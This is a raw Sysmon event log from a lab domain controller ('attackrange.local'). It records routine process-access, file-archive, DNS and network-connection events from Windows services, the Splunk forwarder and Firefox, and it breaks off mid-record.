20:02:54.986{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034914Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034913Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034912Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7996-6042-0500-00000000AD01}412428C:\Windows\system32\csrss.exe{CB3070D7-8E6E-6042-EA07-00000000AD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034911Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6E-6042-EA07-00000000AD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034910Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.989{CB3070D7-8E6E-6042-EA07-00000000AD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000034909Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2E69456511C14C4A55B3838970A102C,SHA256=A99F2F1147A54E658821647BCD9994500E9190117384ABDE74C73B654EFBB02F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034908Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3DEED6912F9FEE2031FDD87ECD56ABB6,SHA256=3C7A49BD51EDB2BEC5270981769004B90F1F78AD6CA23B91FC5FB53059FB66B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034907Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6E-6042-E907-00000000AD01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034906Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034905Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034904Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034903Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034902Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7996-6042-0500-00000000AD01}412428C:\Windows\system32\csrss.exe{CB3070D7-8E6E-6042-E907-00000000AD01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034901Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.347{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6E-6042-E907-00000000AD01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034900Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.349{CB3070D7-8E6E-6042-E907-00000000AD01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000034920Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:56.189{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5438A17F6B2C4C4C585BD4B41A7D6D0,SHA256=4EF64E893DFD0E3AF7AD409E1290EF6D62E566EF15E6486228F2B5F9A844CC9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034919Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:56.189{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=250AEBB7F18C255FA24F87F8B73D8AF9,SHA256=98B91F1E083EEA478E8B081BD234958E2D92EB2639E61B40E8CEE58D14E0C72E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034923Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.278{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61909-false10.0.1.12-8000- 23542300x800000000000000034922Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.392{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E8B085CA2EDA13F385F86F1D5C306A,SHA256=118F7807071965FF96F9C24529B2E56FADC0EE24700F924EFE179817A79772DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034921Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.392{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E67BAD1E4328EAC9DC0C0FAFA7157E4D,SHA256=B78E200FA03B4FE895E02BFDFBDF47CFF2A4EB902B5515754423366E4BDB10F6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000034925Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:58.241{CB3070D7-863B-6042-C506-00000000AD01}6096C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\SiteSecurityServiceState.txt2021-03-05 19:32:58.133 23542300x800000000000000034924Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:58.241{CB3070D7-863B-6042-C506-00000000AD01}6096ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\SiteSecurityServiceState.txtMD5=BB75CAB47E4CCE10802BE44270D5F7E5,SHA256=A5C5830BBA138C8F66C2BA47D4EAB96BC136E2E7835F045F41D10A0033028607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034926Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:59.397{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134BD18489E276A9073F45A7D9AD5B2E,SHA256=1EF5F76338815552DB0AAC9081EC81FA0CF835EC4EB821BB0118E04031293759,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034929Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:00.580{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2600FC6A9B5F5B949A911ACD9A787E9F,SHA256=3926DF690BFA60AB2304CF39136665F7D57983D85CEF3FFE0ACE6016986CCC08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034928Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:00.579{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05513DB0CB6FF09E30DECEEFC82F975D,SHA256=B4D7B3EB7A63B335F106AE3595A883285134729EBCF9857D9883963F6637DFE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034927Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:00.061{CB3070D7-863B-6042-C506-00000000AD01}6096ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034931Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:01.735{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5EC598238DC116FB84A134EB9C922B,SHA256=628216CF2B88144A1A62A1748A760007FF79160A808B40E1A777ED92E63B1459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034930Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:01.102{CB3070D7-863B-6042-C506-00000000AD01}6096ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\broadcast-listeners.jsonMD5=38418CE467F2B6DBAC87FDFBD0573201,SHA256=02D76CEFC7A9B3F811F16C1651AE8537E50074F065210156CAEED02C7ED10D0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034939Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:02.907{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3974F464A49C54A7BBF449F702B722BF,SHA256=4894953517BBD262259FEF405ACEF43BB76200781B0700F4381A4924B37AC966,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034938Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.808{CB3070D7-863B-6042-C506-00000000AD01}6096C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-725.attackrange.local61911-false13.224.10.126server-13-224-10-126.sea19.r.cloudfront.net443https 354300x800000000000000034937Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.748{CB3070D7-863B-6042-C506-00000000AD01}6096C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-725.attackrange.local61910-false52.84.169.62server-52-84-169-62.sea19.r.cloudfront.net443https 354300x800000000000000034936Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.728{CB3070D7-79A8-6042-2600-00000000AD01}2944C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local65130- 354300x800000000000000034935Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.728{CB3070D7-79A8-6042-2600-00000000AD01}2944C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local53539- 354300x800000000000000034934Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:57.726{CB3070D7-79A8-6042-2600-00000000AD01}2944C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local52949- 23542300x800000000000000034933Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:02.321{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=426C69E9F230A05B4FF6B9DC89C76299,SHA256=474BC2CD0F49BD25D7C867A7362D61B6D01270E9814C14C11BD0401B1580244D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034932Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:02.321{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9741F008CA93C11BB98EB0B5099B231E,SHA256=C843ABF0268BF857533253090927EF284BB2792A35FC1C347AE0814B630F6862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034942Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:03.508{CB3070D7-7998-6042-1200-00000000AD01}768NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4AD6A30BDF9DFB1E6634DEFECB50AAA5,SHA256=84F3430EE49263C91F898A9C7503EB7DDD746479700CCC519921D673FAB949B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034941Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:03.487{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F94B97CF5CA30AB8AD6E1137BA97C656,SHA256=D2BDC3C803D430E2FAB8E26591C8E55F8AC1B39C925D377B441AF0DE5AAAB55A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034940Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:59.313{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61912-false10.0.1.12-8000- 23542300x800000000000000034943Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:04.056{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A6780EA351101ECB1F1ADC078999A5,SHA256=292BE95E175CBBDC804B0EB53954A06DAD63EE02027DB86AFE8B7F2DC03B60B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034944Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:05.228{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA0457EDFB49BA4603DFED6AD36BC6B,SHA256=805D6C8670E88371CE4381500C75FCB1B7328200FC9B817B77DA3F2B9CF5333E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034946Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:06.395{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program 